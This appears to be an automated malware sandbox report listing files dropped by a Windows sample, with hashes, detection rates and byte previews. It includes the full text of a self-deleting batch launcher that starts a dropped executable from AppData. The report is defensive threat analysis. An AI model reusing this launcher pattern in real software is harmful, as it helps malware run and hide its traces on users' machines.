SHA-512:	C254F8158AE4739FC1B589B20C7990D81E335770476F9DD84BE385ABEC5007DC3F6EA39358F2738A735F6D571C1D1ED0396A10654578295AF3A39C13EF2DDFBF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="506368" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15D6.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77434
Entropy (8bit):	3.09913261925337
Encrypted:	false
SSDEEP:	1536:W0O12gybqECChXk2aYxgAunaU0ZZ//AbrqcRQIUmUmGZWg8kLi5G:W0O12gybqECChXk2aYxgAIaU0ZZ//AbA
MD5:	82BA300FEF6C54FD45C3DF27EFF56D47
SHA1:	9E5D8D5E874C5BC1E6FB39F669D2147D4EC6818B
SHA-256:	08282BC3341DAABD2D30196D844190CBE3B5465AC66D9407A9B7A97E5B8B0509
SHA-512:	46EDFA5D2813AE0408EC8725EBB14666EC98C0E9F714FB44D0215F1589381B1A938D60F8219E4084CD67D68283BBAA898E5C80E81F087B056FD46A5891123EA8
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1626.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6956646204153656
Encrypted:	false
SSDEEP:	96:TiZYWrvyvoxmYWY8ZaMXOH4UYEZgVtFi4+T1VMwZgA6aAQXXMpGgIzGo:2ZDcRVLygfaAQXXMpG3zGo
MD5:	1F68E545527B04DFE94F5FE85F0F1730
SHA1:	9B01EF3E28164A00B2EA0909DD8F5868781127CA
SHA-256:	C4F933100A1E8C2ACE7DE9E8A46DEC7BC317CF4286887E10F49F6A95A10E80B4
SHA-512:	80B79BCDA78F4E363263D9346A7BC29BA8015923F370D32E65FADB6294CF6CA68A1399BF73C36812FC1508F947EFF3631649484F5E854B00731AF5CC28184271
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Roaming\HPd7I3vQri.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Roaming\HPd7I3vQri.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.137989037915285
Encrypted:	false
SSDEEP:	6:kKSDPvplD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KDbaDnLNkPlE99SNxAhUe/3
MD5:	2E1BC352E062F39F2A4A66091431D51A
SHA1:	B4FDD15998965FD4BF96815980DB12357A806E34
SHA-256:	E4C957434B8B4C350E7AA6841A8E28A7FFBA1B64D6781D227E579D4CB649A8E8
SHA-512:	4EC830FE5BAFD695C60AE1D3C32C5D42697BC2DC8279759127E58AC0FC76690EC1674EC9AC70BACB9499D3486F61FAF0F5ACEC4A9168B0C4E656974281A74C50
Malicious:	false
Preview:	p...... ........U..f*...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Current.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yTRfYxWiym.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\yTRfYxWiym.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.356471432431617
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
MD5:	E56A6A79CB531084A51F12C271BE7439
SHA1:	97A016CBE4C221936BAB8F76D33F7C021AA19ADF
SHA-256:	FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
SHA-512:	B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT54FFSL7ET46RASB.exe.log

Download File

Process:	C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\l6E.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\l6E.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat

Download File

Process:	C:\Users\user\AppData\Roaming\HPd7I3vQri.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	172
Entropy (8bit):	5.062246560354637
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLqFvEROr+jn9m1N+EaKC5i0ZBktKcKZG1N+E2J5xAI4aqn:hCRLqFcROr+DE1N7aZ5i0ZKOZG1N723Y
MD5:	49E6C3C5C9916E532BA8C2647924A96D
SHA1:	09EBB4DF4A0C24FA59700006DA4CBE37FB7EA67E
SHA-256:	8ED90404B9BB8E08D624765951119AE03D9DA21F608BAF4838EA59D8E033179D
SHA-512:	FD71035D6624021FEDFC72A8A9D91837C20C211F9483F7ADE6A51644391E76D78C0982399E652F858B5817D754925B5EC571AEA0B69393DF1090BDD312E0CFBE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 5 localhost > nul..start "" "C:\Users\user\AppData\Roaming\l6E.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat"

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fh5ksvk.l11.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ld1z35cz.hbe.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwrzo3lj.vw0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugj51shn.cr0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Download File

Process:	C:\Users\user\AppData\Roaming\yTRfYxWiym.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	729600
Entropy (8bit):	7.955187915697694
Encrypted:	false
SSDEEP:	12288:7egbADMgyjwvQ4+IHqhIs2SXdBG2DtMM2rvzaUwvEZmKHX:7vJjcvQhIK27em4tgDwvsmK3
MD5:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
SHA1:	60AE0666DA4A38F4881511149CE3BE848844B9FD
SHA-256:	7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7
SHA-512:	BA5250CD1D7D301B3070083053477319D1FCFA3AFC38533DE5BBEFD1251C6D73B1F24DA08C37FDB2715E67B07C0799C89E59DDAA16F2EB7117EAD977E453E88C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 42%, Browse
Joe Sandbox View:	Filename: o9OIGsDt4m.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...]/................0.................. ....@...... .......................`............`...@......@............... ...............................@..h............................................................................................ ..H............text........ ...................... ..`.rsrc...h....@......................@..@........................................H............U..............................................................(......0..........8{...... ....o....8U..... ..:sf .r..a~w...{>...a(...(....o....8........o......o....o......8....s......8,..... .... ...a~w...{q...a(...(....o....8.....s......8..... `?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8..........o....&8.......(......8.......s......8.........o....8l....+...(...... .LX8 #.Z.Y ...{a~w...{....a(...( .........o!...&8<

C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	352768
Entropy (8bit):	7.854006767539572
Encrypted:	false
SSDEEP:	6144:dN1noCMJh6qP/LEkjKVP4vWtL9KeaIQ3Wjn2XJBck0XU9EljKwt0bRg:IS6/Ykj0P4vWtL9Kk6KOBfUx+Qyg
MD5:	C164ED9887BD51CBA150379514DC4E81
SHA1:	178639B8961FA5236683498E06F78B8887155999
SHA-256:	B748235A791B5F8C5B80202EF3345BC8325A7EA246B004D57DF5521E2F79B429
SHA-512:	778DED0EE041DC7710AAA8B76BB3C7ABF319744BEA48BBA91F2013CEA2B1704DFAADABBC675B4035AC3C0DB68AE046B3737E8E42815FB864B6A146B575CBD65A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 62%, Browse
Joe Sandbox View:	Filename: 57lklPjdPc.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D...............0..X..........nw... ........@.. ....................................@................................. w..K.......p............................................................................ ............... ..H............text...tW... ...X.................. ..`.rsrc...p............Z..............@..@.reloc...............`..............@..B................Pw......H.......P...XR..............................................................(......(......0..l.......(...... ....o..... .Z.p ..!a~M...{{...a('...(....o..... XE. .@.ka~M...{>...a('...(....o......o.....o....o.....s..... .~.......%.....(....s........s.........o....s.......o....s....................o....&...(.........s..........o....s .........o....o!........c.....9......o"......9......o"......9......o"......9......o".....9.....o".....9.....o".....9.....o"......A...........

C:\Users\user\AppData\Roaming\l6E.exe

Download File

Process:	C:\Users\user\AppData\Roaming\HPd7I3vQri.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	354168
Entropy (8bit):	7.9876324425692316
Encrypted:	false
SSDEEP:	6144:HDd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QE:B+O5yIqxwI3tFOqWeqcYbZYzE
MD5:	FAC2188E4A28A0CF32BF4417D797B0F8
SHA1:	1970DE8788C07B548BF04D0062A1D4008196A709
SHA-256:	D737637EE5F121D11A6F3295BF0D51B06218812B5EC04FE9EA484921E905A207
SHA-512:	58086100D653CEEAE44E0C99EC8348DD2BEAF198240F37691766BEE813953F8514C485E39F5552EE0D18C61F02BFF10C0C427F3FEC931BC891807BE188164B2B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 54%, Browse
Joe Sandbox View:	Filename: 57lklPjdPc.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4...........R... ...`....@.. ....................................`..................................R..S....`...............>..x)..........PQ............................................... ............... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B.................R......H.......XA.................................................................) .j.\E...\...p..M.:..[.1..,j,@}g......b..CZ.)...^....Z..............M\|...!.D&.&K.RbW..L..._r..c...u....0..7(..m0]...(..x\...*..;.}:.[.J.$=....&h,\..`M.!x.....`.)C...h.p(...}.{.n.+J\C....=..?#.A...#....j&G.`5b....\|.FT..>Z...A....w.&..J...5...uf..J.U.2F....Gd.F......+".P..N'.D...$.G:2.Rm`5......Zz ...H..Q.._...F.j.h`.UE.W.Sc(./..D..@xn.....<#hk=b.f.\.......1...x....+.b.m+f..b..'...n

C:\Users\user\AppData\Roaming\yTRfYxWiym.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	729600
Entropy (8bit):	7.955187915697694
Encrypted:	false
SSDEEP:	12288:7egbADMgyjwvQ4+IHqhIs2SXdBG2DtMM2rvzaUwvEZmKHX:7vJjcvQhIK27em4tgDwvsmK3
MD5:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
SHA1:	60AE0666DA4A38F4881511149CE3BE848844B9FD
SHA-256:	7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7
SHA-512:	BA5250CD1D7D301B3070083053477319D1FCFA3AFC38533DE5BBEFD1251C6D73B1F24DA08C37FDB2715E67B07C0799C89E59DDAA16F2EB7117EAD977E453E88C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...]/................0.................. ....@...... .......................`............`...@......@............... ...............................@..h............................................................................................ ..H............text........ ...................... ..`.rsrc...h....@......................@..@........................................H............U..............................................................(......0..........8{...... ....o....8U..... ..:sf .r..a~w...{>...a(...(....o....8........o......o....o......8....s......8,..... .... ...a~w...{q...a(...(....o....8.....s......8..... `?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8..........o....&8.......(......8.......s......8.........o....8l....+...(...... .LX8 #.Z.Y ...{a~w...{....a(...( .........o!...&8<

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4694702820402785
Encrypted:	false
SSDEEP:	6144:1zZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNqjDH5S:NZHtYZWOKnMM6bFpQj4
MD5:	00B2FA97249321E81D535493CAACA822
SHA1:	A576EA5B590F2D64A8B0E3B6B28EB43CD0B1B5B6
SHA-256:	3307B477E562178920F61B75BEEFC1900DF7B82C092E842066CE588CE5C53943
SHA-512:	93118E7FD47386401AFC08A3E5F2C7B5BCAFD41112DA637A7A44FCF294C9A9FE341639874A2E4C622391E519FCDA35B40002B867CA5ECD89901A9D296C7367A9
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....*................................................................................................................................................................................................................................................................................................................................................w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	365
Entropy (8bit):	4.7349637182847735
Encrypted:	false
SSDEEP:	6:PzgvmWxHLTSJALTSJALTSJALTSJALTSrcsWTo65FWjwAFeMmvVOIHJFxMVlmJHal:Pc5pTcgTcgTcgTcgTLs4oSsEAFSkIrxU
MD5:	148A9A9800156DF48297040134785067
SHA1:	3AB6F75286B9CE030FFFB18AA1ECED0834113E1B
SHA-256:	D2CAC7A30E7EB95146916D6404353A9AAB097F2C37798CC3E15585CE6D77B14F
SHA-512:	88AC939E55AD2E2EE9F4F04A73F81CBEDBC2FEC6FE725551440510985EA14F6BC2F03A6585153F0F3291714E33092D6243CE6160E30BFE3F178416BD6B49FC57
Malicious:	false
